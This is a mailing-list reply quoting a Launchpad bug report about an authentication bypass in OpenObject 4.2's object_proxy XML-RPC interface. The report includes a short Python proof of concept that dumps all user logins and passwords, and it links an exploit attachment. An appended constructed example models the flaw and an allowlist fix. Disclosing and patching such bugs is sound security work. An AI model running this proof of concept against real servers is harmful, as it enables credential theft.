I tried to use this and I cannot replicate this bug, can you guide me please!

2010/4/26 Eduard Carreras i Nadal <email address hidden>
> Today, 4 months later, the vulnerability is still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of the object xml-rpc interface using another
> interface called object_proxy. The only requisite is that the server is
> initialized (e.g. someone does the login or tries to login).
>
> This is solved in 5.0 but not in 4.2.
> In bazaar 4.2 is tagged as mature and I can't understand why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers which
> someones still working on 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login',
> 'password'])
> for u in f:
>     print ' user: %s pass: %s' % (u['login'], u['password'])
>
>
>
--
Best regards
Nhomar G. Hernandez M. geronimo. com.ve openerp. netquatro. com
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://
IT Services: http://
Linux-Counter: 467724
E-mail:
<email address hidden>
<email address hidden>
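
For readers following the quoted bug description, the class of flaw it reports (an internal service reachable by name next to the authenticated one) and an export allowlist as one mitigation can be modelled as below. This is an added example, not OpenObject code and not the patch attached to the bug; every class, function and credential in it is a constructed assumption, with only the names `object_proxy`, `execute`, `terp` and `res.users` taken from the report.

```python
# Constructed model of a name-based XML-RPC service registry; not OpenObject code.
class AccessDenied(Exception):
    pass

PASSWORDS = {("terp", 1): "admin-pw"}  # constructed credential store

class ObjectProxy:
    """Internal service: trusts its caller and performs no credential check."""
    def execute(self, db, uid, model, method, *args):
        return "%s.%s run as uid %d on %s" % (model, method, uid, db)

class ObjectService:
    """Public facade: authenticates, then delegates to the internal service."""
    def __init__(self, inner):
        self.inner = inner

    def execute(self, db, uid, passwd, model, method, *args):
        if PASSWORDS.get((db, uid)) != passwd:
            raise AccessDenied("bad credentials")
        return self.inner.execute(db, uid, model, method, *args)

proxy = ObjectProxy()
SERVICES = {"object_proxy": proxy, "object": ObjectService(proxy)}
EXPORTED = {"object": {"execute"}}  # allowlist: service -> remotely callable methods

def dispatch_vulnerable(path, method, params):
    # Any registered service is reachable by URL, including internal ones.
    service = SERVICES[path.rsplit("/", 1)[-1]]
    return getattr(service, method)(*params)

def dispatch_hardened(path, method, params):
    # Only explicitly exported service/method pairs are reachable remotely.
    name = path.rsplit("/", 1)[-1]
    if method not in EXPORTED.get(name, ()):
        raise AccessDenied("%s.%s is not exported" % (name, method))
    return getattr(SERVICES[name], method)(*params)

def is_denied(dispatch, path, method, params):
    # Helper for checks: True when the dispatcher refuses the call.
    try:
        dispatch(path, method, params)
    except AccessDenied:
        return True
    return False
```
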